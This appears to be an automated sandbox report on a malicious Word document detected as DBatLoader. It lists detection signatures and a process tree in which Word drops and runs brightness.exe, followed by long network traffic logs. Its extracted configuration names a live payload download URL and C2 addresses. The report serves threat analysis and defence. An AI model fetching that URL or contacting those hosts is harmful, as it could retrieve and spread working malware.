Edit tour

Windows Analysis Report
zYj1wg0cM2.doc

Overview

General Information

Sample name:	zYj1wg0cM2.doc (renamed file extension from none to doc, renamed because original name is a hash value)
Original sample name:	96882b077a607f34cd963461341d728982e2075ffd4891f1b91e915da904cfe0
Analysis ID:	1587350
MD5:	3db6baf168cecc916012a59b6530175a
SHA1:	7d74c680b09f982271a50483ce350a5b3d9a0996
SHA256:	96882b077a607f34cd963461341d728982e2075ffd4891f1b91e915da904cfe0
Infos:

Detection

DBatLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected DBatLoader

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Document contains an embedded VBA with functions possibly related to HTTP operations

Document exploit detected (process start blacklist hit)

Drops executables to the windows directory (C:\Windows) and starts them

Machine Learning detection for sample

Office process drops PE file

Office process queries suspicious COM object (likely to drop second stage)

Sigma detected: File With Uncommon Extension Created By An Office Application

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Creates files inside the system directory

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Downloads executable code via HTTP

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Sigma detected: Suspicious Office Outbound Connections

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

WINWORD.EXE (PID: 7244 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)

brightness.exe (PID: 7972 cmdline: C:\Windows\SysWOW64\brightness.exe MD5: 483AB6BD562B28782D0999ABEC4F57F5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["http://amazonenviro.com/245_Aiymwhpjxsg"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.3375169126.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000007.00000002.3359324067.00000000022D6000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security

Unpacked PEs

Source	Rule	Description	Author
7.2.brightness.exe.22d65a8.0.raw.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
7.2.brightness.exe.28f0000.2.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
7.2.brightness.exe.22d65a8.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: File With Uncommon Extension Created By An Office Application

Source: File created

Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 7244, TargetFilename: C:\Windows\SysWOW64\brightness.exe

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49736, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 7244, Protocol: tcp, SourceIp: 147.124.216.113, SourceIsIpv6: false, SourcePort: 80

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: zYj1wg0cM2.doc

Avira: detected

Antivirus detection for URL or domain

Source: http://amazonenviro.com/245_Aiymwhpjxsg	Avira URL Cloud: Label: malware
Source: http://amazonenviro.com:80/245_Aiymwhpjxsg	Avira URL Cloud: Label: malware

Found malware configuration

Source: 7.0.brightness.exe.400000.0.unpack

Malware Configuration Extractor: DBatLoader {"Download Url": ["http://amazonenviro.com/245_Aiymwhpjxsg"]}

Multi AV Scanner detection for dropped file

Source: C:\Windows\SysWOW64\brightness.exe

ReversingLabs: Detection: 75%

Multi AV Scanner detection for submitted file

Source: zYj1wg0cM2.doc	Virustotal: Detection: 70%			Perma Link
Source: zYj1wg0cM2.doc	ReversingLabs: Detection: 57%

Machine Learning detection for sample

Source: zYj1wg0cM2.doc

Joe Sandbox ML: detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_028F58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

7_2_028F58B4

Software Vulnerabilities

Document exploit detected (creates forbidden files)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Windows\SysWOW64\brightness.exe

Jump to behavior

Document exploit detected (drops PE files)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: brightness.exe.0.dr

Jump to dropped file

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process created: C:\Windows\SysWOW64\brightness.exe

Source: global traffic

DNS query: name: amazonenviro.com

Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49752 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49754 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49756 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49759 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49761 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49763 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49765 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49767 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49770 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49772 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49774 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49777 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49787 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49796 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49803 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49815 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49822 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49831 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49841 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49847 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49855 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49863 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49872 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49882 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49889 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49900 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49908 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49916 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49925 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49934 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49944 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49953 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49962 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49971 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49980 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49987 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:49995 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50003 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50012 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50022 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50030 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50040 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50048 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50057 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50067 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50074 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50084 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50093 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50101 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50108 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50116 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50122 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50124 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50126 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50128 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50130 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50133 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50135 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50137 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50139 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50141 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50143 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50145 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50147 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50149 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50151 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50153 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50155 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50157 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50159 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50161 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50163 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50165 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50167 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50169 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50171 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50173 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50175 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50177 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50179 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50181 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50183 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50185 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50187 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50189 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50191 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50193 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50195 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50197 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50199 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50201 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50203 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50205 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50207 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50209 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50211 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50213 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50215 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50217 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50219 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50221 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50223 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50225 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50227 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50229 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50231 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50233 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50235 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50237 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50239 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50241 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50243 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50245 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.4:50247 -> 166.62.27.188:80

Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
